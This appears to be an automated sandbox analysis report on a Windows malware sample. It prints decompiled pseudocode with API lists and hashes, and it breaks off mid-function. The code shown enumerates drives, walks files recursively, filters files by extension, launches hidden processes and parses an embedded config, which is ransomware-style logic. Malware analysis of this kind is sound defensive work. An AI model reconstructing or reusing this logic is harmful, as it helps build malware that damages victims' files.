                                    • GetTickCount.KERNEL32 ref: 0F1440E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                    • String ID: ?:\
                                    • API String ID: 458387131-2533537817
                                    • Opcode ID: 66dde436c23a7114eccc564425c8a755b240f972974c5d2d2586c30158b8cb33
                                    • Instruction ID: 3446c68ec99b13028b9b7cc992a8e89d23d78ae756f0ff96c3dde7f11f1ed1bb
                                    • Opcode Fuzzy Hash: 66dde436c23a7114eccc564425c8a755b240f972974c5d2d2586c30158b8cb33
                                    • Instruction Fuzzy Hash: 1A5134745083009FD310CF18C884B5ABBE5FFC8724F514A2DF9899B391D375A958CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F146F40(void* _a4) {
                                    				intOrPtr _v0;
                                    				intOrPtr _v4;
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				struct _CRITICAL_SECTION _v40;
                                    				WCHAR* _t12;
                                    				void* _t22;
                                    
                                    				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                    				_t22 = _a4;
                                    				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                    				InitializeCriticalSection( &_v40);
                                    				_v12 = 0x2710;
                                    				_v8 = 0;
                                    				_v4 = 0xffffffff;
                                    				_v0 = 0xffffffff;
                                    				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                    				E0F146DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                    				VirtualFree(_t22, 0, 0x8000);
                                    				ExitThread(0);
                                    			}











                                    0x0f146f59
                                    0x0f146f5f
                                    0x0f146f6e
                                    0x0f146f7c
                                    0x0f146f90
                                    0x0f146f98
                                    0x0f146fa0
                                    0x0f146fa8
                                    0x0f146fb6
                                    0x0f146fcb
                                    0x0f146fdb
                                    0x0f146fe3

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F146F59
                                    • wsprintfW.USER32 ref: 0F146F6E
                                    • InitializeCriticalSection.KERNEL32(?), ref: 0F146F7C
                                    • VirtualAlloc.KERNEL32 ref: 0F146FB0
                                      • Part of subcall function 0F146DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
                                      • Part of subcall function 0F146DF0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
                                      • Part of subcall function 0F146DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F146FDB
                                    • ExitThread.KERNEL32 ref: 0F146FE3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                    • String ID: %c:\
                                    • API String ID: 1988002015-3142399695
                                    • Opcode ID: 50d0d1192b859ee5ca6a6d4bda885b23bdf6f17a5f705432d50675ee6e1424be
                                    • Instruction ID: fabd5a2e80850e9dacfefdb88640fd78b7dac89711d757c1285766601b59627e
                                    • Opcode Fuzzy Hash: 50d0d1192b859ee5ca6a6d4bda885b23bdf6f17a5f705432d50675ee6e1424be
                                    • Instruction Fuzzy Hash: 290196B5184300BBE7109F54CC8AF177BA8AF84B25F004614FB659A2C1D7B8B558CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F1469B0(WCHAR* __ecx) {
                                    				intOrPtr _v8;
                                    				signed int _t11;
                                    				void* _t20;
                                    				void* _t23;
                                    				signed int _t26;
                                    				signed int _t27;
                                    				intOrPtr _t28;
                                    				void* _t31;
                                    				signed short* _t35;
                                    				WCHAR* _t38;
                                    				WCHAR* _t40;
                                    				void* _t44;
                                    
                                    				_push(__ecx);
                                    				_t38 = __ecx;
                                    				if( *0xf152a60 != 0) {
                                    					_t11 = lstrlenW(__ecx);
                                    					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                    					if(_t11 == 0) {
                                    						L7:
                                    						return 1;
                                    					} else {
                                    						while( *_t40 != 0x2e) {
                                    							_t40 = _t40 - 2;
                                    							_t11 = _t11 - 1;
                                    							if(_t11 != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						if(_t11 != 0) {
                                    							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                    							wsprintfW(_t23, L"%s ", _t40);
                                    							_t35 =  *0xf152a60; // 0x0
                                    							_t28 = 0;
                                    							_v8 = 0;
                                    							if( *_t23 == 0) {
                                    								L20:
                                    								_t29 =  !=  ? 1 : _t28;
                                    								_v8 =  !=  ? 1 : _t28;
                                    							} else {
                                    								_t26 =  *_t35 & 0x0000ffff;
                                    								if(_t26 != 0) {
                                    									_t44 = _t35 - _t23;
                                    									do {
                                    										_t20 = _t23;
                                    										if(_t26 == 0) {
                                    											L16:
                                    											if( *_t20 == 0) {
                                    												goto L19;
                                    											} else {
                                    												goto L17;
                                    											}
                                    										} else {
                                    											while(1) {
                                    												_t27 =  *_t20 & 0x0000ffff;
                                    												if(_t27 == 0) {
                                    													break;
                                    												}
                                    												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                    												if(_t31 != 0) {
                                    													goto L16;
                                    												} else {
                                    													_t20 = _t20 + 2;
                                    													if( *(_t44 + _t20) != _t31) {
                                    														continue;
                                    													} else {
                                    														goto L16;
                                    													}
                                    												}
                                    												goto L21;
                                    											}
                                    											L19:
                                    											_t28 = 0;
                                    											goto L20;
                                    										}
                                    										goto L21;
                                    										L17:
                                    										_t26 = _t35[1] & 0x0000ffff;
                                    										_t35 =  &(_t35[1]);
                                    										_t44 = _t44 + 2;
                                    									} while (_t26 != 0);
                                    								}
                                    							}
                                    							L21:
                                    							VirtualFree(_t23, 0, 0x8000);
                                    							return _v8;
                                    						} else {
                                    							goto L7;
                                    						}
                                    					}
                                    				} else {
                                    					return 1;
                                    				}
                                    			}















                                    0x0f1469b3
                                    0x0f1469bc
                                    0x0f1469be
                                    0x0f1469d2
                                    0x0f1469d7
                                    0x0f1469dc
                                    0x0f1469f0
                                    0x0f1469fa
                                    0x0f1469e0
                                    0x0f1469e0
                                    0x0f1469e6
                                    0x0f1469e9
                                    0x0f1469ea
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f1469ea
                                    0x0f1469ee
                                    0x0f146a17
                                    0x0f146a1f
                                    0x0f146a25
                                    0x0f146a2b
                                    0x0f146a30
                                    0x0f146a36
                                    0x0f146a82
                                    0x0f146a89
                                    0x0f146a8c
                                    0x0f146a38
                                    0x0f146a38
                                    0x0f146a3e
                                    0x0f146a42
                                    0x0f146a44
                                    0x0f146a44
                                    0x0f146a49
                                    0x0f146a69
                                    0x0f146a6d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f146a4b
                                    0x0f146a50
                                    0x0f146a50
                                    0x0f146a56
                                    0x00000000
                                    0x00000000
                                    0x0f146a5c
                                    0x0f146a5e
                                    0x00000000
                                    0x0f146a60
                                    0x0f146a60
                                    0x0f146a67
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f146a67
                                    0x00000000
                                    0x0f146a5e
                                    0x0f146a80
                                    0x0f146a80
                                    0x00000000
                                    0x0f146a80
                                    0x00000000
                                    0x0f146a6f
                                    0x0f146a6f
                                    0x0f146a73
                                    0x0f146a76
                                    0x0f146a79
                                    0x0f146a7e
                                    0x0f146a3e
                                    0x0f146a8f
                                    0x0f146a97
                                    0x0f146aa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f1469ee
                                    0x0f1469c0
                                    0x0f1469c9
                                    0x0f1469c9

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F146AEA), ref: 0F1469D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: %s
                                    • API String ID: 1659193697-4273690596
                                    • Opcode ID: ff2b89f328b85d06113097dd6c2853c636b74ffba22748c9da5e4d1220aab46a
                                    • Instruction ID: a05deca82618880eb2d0ca1f998f653d379864583792ec580b6603cb1bc63fa0
                                    • Opcode Fuzzy Hash: ff2b89f328b85d06113097dd6c2853c636b74ffba22748c9da5e4d1220aab46a
                                    • Instruction Fuzzy Hash: 54213772A006259BD7305F5C9C103B2B3A8EFC2729F558226EC46CB581E7B57DA082E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F144E10(WCHAR* __ecx) {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOW _v92;
                                    				intOrPtr _t15;
                                    				intOrPtr _t16;
                                    				WCHAR* _t25;
                                    
                                    				asm("xorps xmm0, xmm0");
                                    				_t25 = __ecx;
                                    				asm("movdqu [ebp-0x10], xmm0");
                                    				E0F149170( &_v92, 0, 0x44);
                                    				_t15 =  *0xf152a6c; // 0x0
                                    				_v92.hStdError = _t15;
                                    				_v92.hStdOutput = _t15;
                                    				_t16 =  *0xf152a68; // 0x0
                                    				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                    				_v92.hStdInput = _t16;
                                    				_v92.wShowWindow = 0;
                                    				_v92.cb = 0x44;
                                    				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                    					CloseHandle(_v20);
                                    					return CloseHandle(_v20.hThread);
                                    				} else {
                                    					return GetLastError();
                                    				}
                                    			}








                                    0x0f144e1c
                                    0x0f144e22
                                    0x0f144e24
                                    0x0f144e29
                                    0x0f144e2e
                                    0x0f144e36
                                    0x0f144e39
                                    0x0f144e3c
                                    0x0f144e41
                                    0x0f144e48
                                    0x0f144e4d
                                    0x0f144e58
                                    0x0f144e77
                                    0x0f144e8d
                                    0x0f144e98
                                    0x0f144e79
                                    0x0f144e83
                                    0x0f144e83

                                    APIs
                                    • _memset.LIBCMT ref: 0F144E29
                                    • CreateProcessW.KERNEL32 ref: 0F144E6F
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 0F144E79
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F144E8D
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F144E92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastProcess_memset
                                    • String ID: D
                                    • API String ID: 1393943095-2746444292
                                    • Opcode ID: 1c2438ebb893abe58845b2b23f63081f93ccaf65d2d7bdda54c843a50feaa6f4
                                    • Instruction ID: b4fda5fffcbb1952d82aad94c4020f5932109d661ce13f2456f0ea1cc2ec085c
                                    • Opcode Fuzzy Hash: 1c2438ebb893abe58845b2b23f63081f93ccaf65d2d7bdda54c843a50feaa6f4
                                    • Instruction Fuzzy Hash: 9B012171E40358ABDB20DFE49C46BDE7BB8EF44B25F100156FA08B6180E7B525648B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0F146E69() {
                                    				intOrPtr* _t34;
                                    				intOrPtr* _t38;
                                    				void* _t40;
                                    				WCHAR* _t46;
                                    				void* _t51;
                                    
                                    				do {
                                    					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                    						lstrcatW(_t46, _t51 - 0x238);
                                    						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                    							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                    							 *_t38 =  *_t38 + E0F146AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                    							asm("adc [ebx+0x4], edx");
                                    							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                    							if(__eflags <= 0) {
                                    								if(__eflags < 0) {
                                    									L8:
                                    									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                    									 *_t34 =  *_t34 + 1;
                                    									__eflags =  *_t34;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                    									if(__eflags < 0) {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							E0F146DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                    						}
                                    						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                    					}
                                    				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                    				FindClose( *(_t51 - 8));
                                    				return 0;
                                    			}








                                    0x0f146e70
                                    0x0f146e84
                                    0x0f146ea8
                                    0x0f146eb1
                                    0x0f146ee2
                                    0x0f146eed
                                    0x0f146eef
                                    0x0f146ef2
                                    0x0f146ef5
                                    0x0f146ef7
                                    0x0f146f00
                                    0x0f146f00
                                    0x0f146f03
                                    0x0f146f03
                                    0x0f146ef9
                                    0x0f146efc
                                    0x0f146efe
                                    0x00000000
                                    0x00000000
                                    0x0f146efe
                                    0x0f146ef7
                                    0x0f146eb3
                                    0x0f146ec7
                                    0x0f146ecc
                                    0x0f146f10
                                    0x0f146f10
                                    0x0f146f23
                                    0x0f146f2e
                                    0x0f146f3c

                                    APIs
                                    • lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146E7C
                                    • lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146E96
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F146EA8
                                    • lstrcatW.KERNEL32(00000000,0F14FF7C), ref: 0F146EB9
                                      • Part of subcall function 0F146DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
                                      • Part of subcall function 0F146DF0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
                                      • Part of subcall function 0F146DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F146F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F146F2E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 2032009209-0
                                    • Opcode ID: 4586828c4c57a20b7441318fc50da76e27d706d193917f6835940da375110827
                                    • Instruction ID: 152618b87493ed90758691ef5aac96d89d7afea13886feaf6358c82e720599c0
                                    • Opcode Fuzzy Hash: 4586828c4c57a20b7441318fc50da76e27d706d193917f6835940da375110827
                                    • Instruction Fuzzy Hash: 33019232A0020DABCF259F60DC48BEEBBB8FF86315F0040A5F945D2151DB36BAA5DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F1433E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                    				int* _v8;
                                    				void* _t8;
                                    				char _t10;
                                    				void* _t14;
                                    				void* _t15;
                                    				char _t18;
                                    				char _t19;
                                    				int _t20;
                                    				CHAR* _t23;
                                    				CHAR* _t26;
                                    				CHAR* _t35;
                                    				CHAR* _t40;
                                    
                                    				_push(__ecx);
                                    				_t26 = _a4;
                                    				_t37 = __ecx;
                                    				_v8 = __ecx;
                                    				__ecx[3] = _t26;
                                    				_t8 = E0F1432B0(__ecx);
                                    				if(_t8 == 0 || _t8 == 0xffffffff) {
                                    					ExitProcess(0);
                                    				}
                                    				if(E0F143320(__ecx) == 0) {
                                    					 *__ecx = 0;
                                    					_t10 =  *_t26;
                                    					if(_t10 == 0) {
                                    						goto L4;
                                    					} else {
                                    						do {
                                    							if(_t10 == 0x7b) {
                                    								_t26 =  &(_t26[1]);
                                    								_t14 = E0F143190(_t26);
                                    								if(_t14 != 0) {
                                    									_t15 = _t14 - 1;
                                    									if(_t15 == 0) {
                                    										E0F143200(_t37, _t26, 1);
                                    									} else {
                                    										if(_t15 == 1) {
                                    											_t18 =  *_t26;
                                    											_t35 = _t26;
                                    											if(_t18 == 0) {
                                    												L15:
                                    												_t19 =  *_t35;
                                    												if(_t19 != 0x7d) {
                                    													_t40 = _t35;
                                    													if(_t19 != 0) {
                                    														while( *_t40 != 0x7d) {
                                    															_t40 =  &(_t40[1]);
                                    															if( *_t40 != 0) {
                                    																continue;
                                    															} else {
                                    															}
                                    															goto L21;
                                    														}
                                    														 *_t40 = 0;
                                    													}
                                    													L21:
                                    													_t20 = lstrlenA(_t35);
                                    													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                    													 *(_v8 + 8) = _t23;
                                    													if(_t23 != 0) {
                                    														lstrcpyA(_t23, _t35);
                                    													}
                                    													 *_t40 = 0x7d;
                                    													_t37 = _v8;
                                    												}
                                    											} else {
                                    												while(_t18 != 0x7d) {
                                    													_t35 =  &(_t35[1]);
                                    													if(_t18 == 0x3d) {
                                    														goto L15;
                                    													} else {
                                    														_t18 =  *_t35;
                                    														if(_t18 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L15;
                                    														}
                                    													}
                                    													goto L25;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							L25:
                                    							_t7 =  &(_t26[1]); // 0x97850fe0
                                    							_t10 =  *_t7;
                                    							_t26 =  &(_t26[1]);
                                    						} while (_t10 != 0);
                                    						return 1;
                                    					}
                                    				} else {
                                    					 *__ecx = 1;
                                    					L4:
                                    					return 1;
                                    				}
                                    			}















                                    0x0f1433e3
                                    0x0f1433e5
                                    0x0f1433e9
                                    0x0f1433eb
                                    0x0f1433ee
                                    0x0f1433f1
                                    0x0f1433f8
                                    0x0f1434db
                                    0x0f1434db
                                    0x0f143410
                                    0x0f143425
                                    0x0f14342b
                                    0x0f14342f
                                    0x00000000
                                    0x0f143431
                                    0x0f143432
                                    0x0f143434
                                    0x0f14343a
                                    0x0f143441
                                    0x0f143444
                                    0x0f14344a
                                    0x0f14344b
                                    0x0f1434ba
                                    0x0f14344d
                                    0x0f14344e
                                    0x0f143450
                                    0x0f143452
                                    0x0f143456
                                    0x0f143467
                                    0x0f143467
                                    0x0f14346b
                                    0x0f14346d
                                    0x0f143471
                                    0x0f143473
                                    0x0f143478
                                    0x0f14347c
                                    0x00000000
                                    0x00000000
                                    0x0f14347e
                                    0x00000000
                                    0x0f14347c
                                    0x0f143480
                                    0x0f143480
                                    0x0f143483
                                    0x0f143484
                                    0x0f143495
                                    0x0f14349e
                                    0x0f1434a3
                                    0x0f1434a7
                                    0x0f1434a7
                                    0x0f1434ad
                                    0x0f1434b0
                                    0x0f1434b0
                                    0x00000000
                                    0x0f143458
                                    0x0f14345c
                                    0x0f14345f
                                    0x00000000
                                    0x0f143461
                                    0x0f143461
                                    0x0f143465
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f143465
                                    0x00000000
                                    0x0f14345f
                                    0x0f143458
                                    0x0f143456
                                    0x0f14344e
                                    0x0f14344b
                                    0x0f143444
                                    0x0f1434bf
                                    0x0f1434bf
                                    0x0f1434bf
                                    0x0f1434c2
                                    0x0f1434c3
                                    0x0f1434d6
                                    0x0f1434d6
                                    0x0f143412
                                    0x0f143412
                                    0x0f143418
                                    0x0f143422
                                    0x0f143422

                                    APIs
                                      • Part of subcall function 0F1432B0: lstrlenA.KERNEL32(?,00000000,?,0F145444,?,?,0F1433F6,00000000,00000000,?,?,0F145444,00000000), ref: 0F1432C5
                                      • Part of subcall function 0F1432B0: lstrlenA.KERNEL32(?,?,0F1433F6,00000000,00000000,?,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1432EE
                                    • lstrlenA.KERNEL32(0F145445,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F143484
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F14348E
                                    • HeapAlloc.KERNEL32(00000000,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F143495
                                    • lstrcpyA.KERNEL32(00000000,0F145445,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1434A7
                                    • ExitProcess.KERNEL32 ref: 0F1434DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                    • String ID:
                                    • API String ID: 1867342102-0
                                    • Opcode ID: 08d0246bca1a98df9eabde7681cfebc1c311a4017b618f09a4685b8a549ebd2f
                                    • Instruction ID: d878f92fbd67dedab6cfd3d46ab79be65ad32f7df60283aacbf70f2e51142f02
                                    • Opcode Fuzzy Hash: 08d0246bca1a98df9eabde7681cfebc1c311a4017b618f09a4685b8a549ebd2f
                                    • Instruction Fuzzy Hash: D23127345042455AEB2A4F6884447F57B949FD2310F9C4189E8F9CB283D77DB8A7E770
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _memset.LIBCMT ref: 0F143D42
                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
                                    • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
                                    • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$InfoVerifyVersion_memset
                                    • String ID:
                                    • API String ID: 3299124433-0
                                    • Opcode ID: cef83f25be2d9a09c498833550395443b3b24b34a6e4776d6810446f0891ba8e
                                    • Instruction ID: 82098c17eff53694ce3f2df1db8eae3fe980248b354be43f86311e0f367ba0f4
                                    • Opcode Fuzzy Hash: cef83f25be2d9a09c498833550395443b3b24b34a6e4776d6810446f0891ba8e
                                    • Instruction Fuzzy Hash: F0110CB0D4031C6EEB609F64DC0ABEA7ABCEF48710F008199A508E61C1D6B95B948FD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F144EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                    				CHAR* _v8;
                                    				char _v12;
                                    				char _v20;
                                    				char _t16;
                                    				char _t20;
                                    				char _t21;
                                    				intOrPtr* _t24;
                                    				intOrPtr _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr* _t29;
                                    				CHAR* _t33;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				void* _t38;
                                    				void* _t41;
                                    				intOrPtr* _t42;
                                    				void* _t47;
                                    				void* _t49;
                                    				intOrPtr* _t51;
                                    				CHAR* _t53;
                                    
                                    				asm("movq xmm0, [0xf14faac]");
                                    				_t16 =  *0xf14fab4; // 0x0
                                    				_t29 = _a4;
                                    				_v8 = __edx;
                                    				_t51 = __ecx;
                                    				asm("movq [ebp-0x10], xmm0");
                                    				_v12 = _t16;
                                    				if( *_t29 == 0) {
                                    					L11:
                                    					if(_t51 == 0) {
                                    						goto L10;
                                    					} else {
                                    						if(_v20 == 0) {
                                    							L22:
                                    							if(_t51 == 0) {
                                    								goto L10;
                                    							} else {
                                    								_t53 = _t51 + lstrlenA( &_v20);
                                    								while(1) {
                                    									_t20 =  *_t53;
                                    									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                    										break;
                                    									}
                                    									_t53 =  &(_t53[1]);
                                    								}
                                    								_t33 = _t53;
                                    								while(1) {
                                    									_t21 =  *_t33;
                                    									if(_t21 < 0x30 || _t21 > 0x39) {
                                    										goto L30;
                                    									}
                                    									L31:
                                    									_t33 =  &(_t33[1]);
                                    									continue;
                                    									L30:
                                    									if(_t21 == 0x2e) {
                                    										goto L31;
                                    									}
                                    									 *_t33 = 0;
                                    									return lstrcpyA(_v8, _t53);
                                    									goto L33;
                                    								}
                                    							}
                                    						} else {
                                    							_t34 =  *_t51;
                                    							if(_t34 != 0) {
                                    								_t47 = _t51 -  &_v20;
                                    								do {
                                    									_t24 =  &_v20;
                                    									if(_t34 == 0) {
                                    										L19:
                                    										if( *_t24 == 0) {
                                    											goto L22;
                                    										} else {
                                    											goto L20;
                                    										}
                                    									} else {
                                    										while(1) {
                                    											_t35 =  *_t24;
                                    											if(_t35 == 0) {
                                    												goto L22;
                                    											}
                                    											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                    											if(_t41 != 0) {
                                    												goto L19;
                                    											} else {
                                    												_t24 = _t24 + 1;
                                    												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                    													continue;
                                    												} else {
